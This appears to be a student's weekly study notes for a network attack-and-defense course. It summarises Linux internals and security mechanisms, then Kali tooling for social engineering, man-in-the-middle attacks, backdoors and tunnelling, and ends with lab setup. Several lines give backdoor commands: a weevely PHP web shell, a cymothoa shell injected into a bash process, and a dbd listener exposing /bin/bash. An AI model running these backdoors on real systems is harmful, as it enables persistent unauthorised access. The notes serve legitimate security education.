"Network Attack and Defense Practice" Eighth Week Learning Summary

1. Chapter 8 Summary of Textbook Contents

Introduction to Linux Operating System

Linux system features:

UNIX compatible: API compatible, management commands and various tools:
open source
Support various hardware platforms, support multiple CPUs
There are a large number of application software on the Linux platform, and applications
with development tools
Various distributions: RedHat (RHEL, Fedora, CentOS, …), Ubuntu, Debian, …

2. Linux operating system:

Not a microkernel system, but has some microkernel features
Intel version: protected mode for i386, privilege level
- Kernel mode (0) and user mode (3)
- Interrupts and system calls - switching between two privilege levels
Multi-user, multi-tasking, time-sharing system
- Multi-user system: A computer capable of concurrently and independently executing several applications (tasks) belonging to multiple users.

3. Linux process

Preemptive multiprocessing (multiprocessing) Operating system multi-process concurrent activities, the system is responsible for scheduling hardware resource usage
PCB: process control block, resident memory
Process is the most basic scheduling unit
Processes are dynamic, each process has a process control block
There is no special scheduling process, there is a schedule function in the kernel to complete the scheduling task

4. Linux system calls

Programming interface, POSIX compliant, a collection of C language functions
function name "sys_xxx"
For example, the corresponding function sys_ fork() of the system call fork
The realization form is similar to INT 21H of DOS
Before Linux 2.6 kernel used int 80h
Linux 2.6 kernel supports sysenter mechanism
System call number and system call table
All system calls have only one entry system_call
Exit: ret_ from_ sys_ call

5. Linux memory management

On i386 machines, each process has its own 4G virtual memory space
32-bit linear address - using hardware paging mechanism
The code segment and data segment of the kernel are mapped to the space above 3G
The actual virtual memory space that can be applied for by the code in user mode is 0-3GB
Each process uses two sets of segment descriptors to access memory, which are used to access
memory space in kernel mode and user mode respectively.
In user mode, it is impossible for the code to access the address space above 3G. If you want to access the
kernel space, you must pass system calls or interrupts.
Linux uses vma (virtual memory area) mechanism for virtual memory management
Page swap mechanism: page fault interrupt, page swap in

6. Linux file system

Linux supports a variety of file systems, including ext, ext2, hpfs, vfat,
ntfs, …
Through the virtual file system VFS, the Linux operating system can support different types
of file systems
Access specific hardware devices through device files in the virtual file system
File system type management
The way to register the file system type:
- Determined when compiling the kernel
- Check in when the filesystem is mounted as a module

7. The Hierarchy of Networking in Linux

Security Architecture and Mechanisms of Linux

1. Linux operating system security mechanism core

AAA mechanism
Authentication, Authorization and Auditing
Authentication
Authentication: user management and user authentication
Authorization(Access Control)
Authorized Access, Access Control: File System Security Control
Accountability
Behavioral Auditing: System Logging Mechanism

2. Linux user authentication

Local user login authentication: login
crypt() function
Network service login authentication: telnet/rsh/ssh/…
ssh public key non-interactive remote authentication
User Authentication for Non-Shell Programs
Apache: MD5 hashed password (created by htpasswd)
Samba: smbpasswd, LANMAN or NTLM hashed password
MySQL: stored in user system table, PASSWORD() function, can use
MD5 or SHA1 hash
Linux PAM: User Authentication Middleware

3.PAM(Pluggable Authentication Modules)

A pluggable authentication mechanism
For a service, specify some authentication-related actions and put them in the /etc/pam.conf file, or put them in a configuration file with the same name as the service under /etc/pam.d/
Each line contains a module type, a control level, a module:
service module-type control-flag module [args]

4. Linux file system security

Inflexible rights management
Permissions can only be assigned to the owner, the owner's group, and other users, without further refinement
POSIX ACLs for Linux packages
- Kernel patch, you can use ACL to manage permissions
- Need to recompile the kernel, download the patch: http://acl.bestbits.at
- Two commands: setfacl, getfacl
actually delete the file
- tool wipe

5. ROOTKIT in the kernel

Through the LKM mechanism, the Trojan module can be inserted into the system kernel
A typical rootkit based on Linux 2.2.x - knark
Use insmod knark.o to load into the kernel
Once the knark backdoor is loaded
- Can change the output of netstat
- Can change the UID and GID of the running process
- It is possible to gain root access without SUID
- ……
There are other ROOTKITS like adore, adore-ng
Countermeasures for Kernel ROOTKITS
Detect based on the characteristics of each rootkit and try to remove it
For prevention, install a kernel detection system, such as LIDS

6.xinetd configuration

7. /etc/services configuration file

8. Implementing network access control with xinetd

Set default deny access
/etc/xinetd.conf set no_access attribute no_access = 0.0.0.0
only_ from =
Fine-grained settings for network access control
The defaults section of xinetd.conf or individual service configuration
files
only_from = allowed access IP segment, domain name segment
no_access = IP range, domain name to deny access
kernel: netfilter
Application layer: ipfwadm -> ipchains -> iptables
Netfilter

9. Linux Kernel Firewall

In the framework, 5 hook positions are defined
Multiple modules can be hooked on each hook
过滤位置: LOCAL_ IN(INPUT) 、FORWARD 、LOCAL_ OUT(OUTPUT)
Offers a variety of functions
packet filtering firewall
Address Translation NAT
Network status detection
……

Linux system remote attack

password guessing
Attacking Linux Network Services
- Data-Driven Attacks on Network Service Daemons
- buffer overflow
- format string
- input validation
- Integer overflow
- …
Default or harmful configuration
Attack Linux

Two, kali video learning

31.KaliSecurity - SET for Vulnerability Exploitation

Understand the use of the set tool in the exploit tool under kali

Social Engineering Toolkit is an open source tool, a Python-driven social engineering penetration testing tool that provides a very rich attack vector library. It is an open source social engineering exploit kit, usually used in conjunction with Metasploit.

1. Open the terminal:

2. Enter 1 and enter to enter the social engineering attack:

There are a total of 11 modules, which are:

3. Enter 1 to enter the spear phishing attack:

The main purpose of this attack vector is to send phishing emails with malware, and the corresponding payload can choose different vulnerabilities (option 2):

4. Return to the main menu and select 2 to enter the website attack framework:

5. Select 3, enter the media infection attack:

Execute Exploit with Autorun.inf to get a returned shell, and it can also be combined with the backdoor of Metasploit.

6. Create payload and listener:

7. Select 5 mass mailing attack, support import list and send mail to everyone in the list

8. Based on Arduino

9. SMS spoofing attack

10. Wireless access point attack: A wireless access point attack will create a virtual wireless AP, through which all incoming device traffic can be captured.

11. QR code attack: Fill in a dangerous URL, so that the attacker scans the QR code to automatically access the page.

12. PowerShell attack: PowerShell attack module for Vista and above

13. Fast-Track attack module

32. KaliSecurity - Sniffing Spoofing and Man-in-the-Middle Attacks

Understand the use of sniffing and spoofing tools under kali, and complete the man-in-the-middle attack experiment. Here are the methods for ARP spoofing, DNS spoofing and sniffing, and session hijacking.

1. Enable port forwarding for Kali settings

2. Set up ssltrip

3. Preparation of ettercap

4.ettercap use

Open the graphical interface:

Select the default eth0 for the sniffing network card:

Open ettercap, select sniff option-unified sniffing-select network card-hosts option: scan for hosts first, and select host list after scanning

5. Introduction of Dsniff suit

6. Session Hijacking

7. Picture interception

8. DNS spoofing

9. URL monitoring

10. Download software monitoring

33.KaliSecurity - permission maintenance backdoor

Learn about the use of backdoors in the kali permission maintenance tool. Permission maintenance includes three subclasses: Tunnel toolset, Web backdoor, and system backdoor. The system backdoor and the web backdoor are collectively referred to as backdoors, which are malicious programs left behind to facilitate re-entry into the system after penetration testing.

1.weevely

Generate a php backdoor, weevely generate test ~/1.php, test is the password, generate ~/1.php locally, and view the generated backdoor:

The backdoor is uploaded to the web and connected using weevely:

(1) Copy the backdoor

(2) View the target machine ip

(3) ssh connection

Unable to connect to target machine with ssh

(4) nano 1.php copy the content of the generated file to it

(5) Use the command weevely http://192.168.14.129/1.php testto connect

Generate backdoor

View the generated backdoor

nano 2.php copy the content of the generated file to it

After uploading to the website, connect using webacoo:webacoo -t -u http://192.168.199.149/2.php

3. Cymothoa system backdoor

Enumerate /bin/bash process pids

cymothoa -10500 -s -0 -y 2333(Inject 2333 port), if successful, you can connect to 2333 port and return to a shell

4.dbd, sdb: enhanced version of nc

Listening side: dbd -l -p 2333 -e /bin/bash -k password

Attacker: dbd 127.0.0.1 2333 -k password

5.U3-Pwn: A tool used in combination with Metasploit Payload, the menu can be single-handedly multi-targeted for mobile optical drive devices such as optical drive images, U disks, etc.

6.Intersect

1. List available modules

2. Create a backdoor script

3. Automatically add components. spawn a shell

4. Create a backdoor

5. Execute the backdoor

(1) Input ./1.py -bfor binding

(2) Use the nc command to connect

(3) If the execution is successful, return a shell

34.KaliSecurity - Tunnel for Privilege Maintenance

Learn about the use of the tunnel tool in kali permission maintenance. The Tunnel tool set includes a series of tools for establishing communication tunnels and proxies.

1. CryptCat: Similar to dbd/sbd.

2、DNS2TCP：

3. Iodine: Similar to DNS2TCP

4. Miredo: Miredo is a network tool. It is mainly used for IPV6 Teredo tunnel conversion of BSD and Linux. It can convert network connections that do not support IPV6 to IPV6. IPV6 and TUN tunnel support are required in the kernel.

5、Proxychains:

A tool is often used in intranet penetration testing. For example, we use Meterpreter to open a Socks4a proxy service. By modifying the /etc/prosychains.conf configuration file and adding a proxy, other tools such as sqlmap and namp can directly use the proxy to scan the internal network. network.

6 、 Proxy tunnel

7. Ptunnel: Establish tunnel communication with ICMP packets

8. Pwant: communicate through UDP under the intranet

9、slh

10.stunnel

11.udptunnel

35. KaliSecurity - Reverse Engineering Tool

Learn about reverse engineering tools under kali

1 、 Computer Debugger

EDB (Evan's Debugger) is a binary debugging tool developed based on Qt4. It is mainly to be in line with the OllyDbg tool. The function can be expanded through the plug-in system. Currently, only Linux is supported.

2、Ollydbg

3, jad: java decompilation tool

4 、 Playback2

5、Recstudio2

6、Apktool

9.Flasm

10.Javasnoop

3. Experiment: Network attack and defense environment construction and testing

A basic network attack and defense experiment environment mainly consists of the following parts: target aircraft, attack aircraft, attack monitoring analysis and defense platform, and network connection.

1. Internet connection

There are three types of network connections for operating systems running on VMware virtual machine software:

Bridge mode (Bridge): In bridge mode, VMware simulates a virtual network card to the client system, and the main system is equivalent to a bridge for the client system. The client system seems to have its own network card and is directly connected to the network, that is to say, the client system is directly visible to the outside world.
Network address translation (NAT): In this mode, the client system cannot connect to the network by itself, but must perform address translation on all the data packets sent and received by the client system entering and leaving the network through the main system. In this way, the client system is invisible to the outside world.
Host mode (Host-Only): In this mode, the host system simulates a virtual switch, and all client systems enter and exit the network through this switch. In this way, if the main system uses the public IP to connect to the Internet, the client system can only use the private IP. But if we install another system to connect to the Internet by bridging (the system becomes a bridge at this time), then we can set the IP of these client systems as public IP, and connect to the Internet directly from this virtual bridge.
In this environment, the network connection mode is set to bridge mode. In this mode, it should be noted that the attacking machine and the target machine should be in the same network segment.

2. Environment construction

攻击机：Windows XP Attacker（Windows）

靶机：Metasploitable（linux），Win2kServer_SP0_target

Install the attack aircraft:

(1) Unzip the rar image of WinXPattacker to a certain directory

(2) File --> Open, select your decompression directory, and select the corresponding vmx file

(3) Configure the hardware of the attack machine virtual machine

View the attacking machine ip:

Install the target drone:

(1) Unzip the rar image of Win2kServer_SP0_target to a directory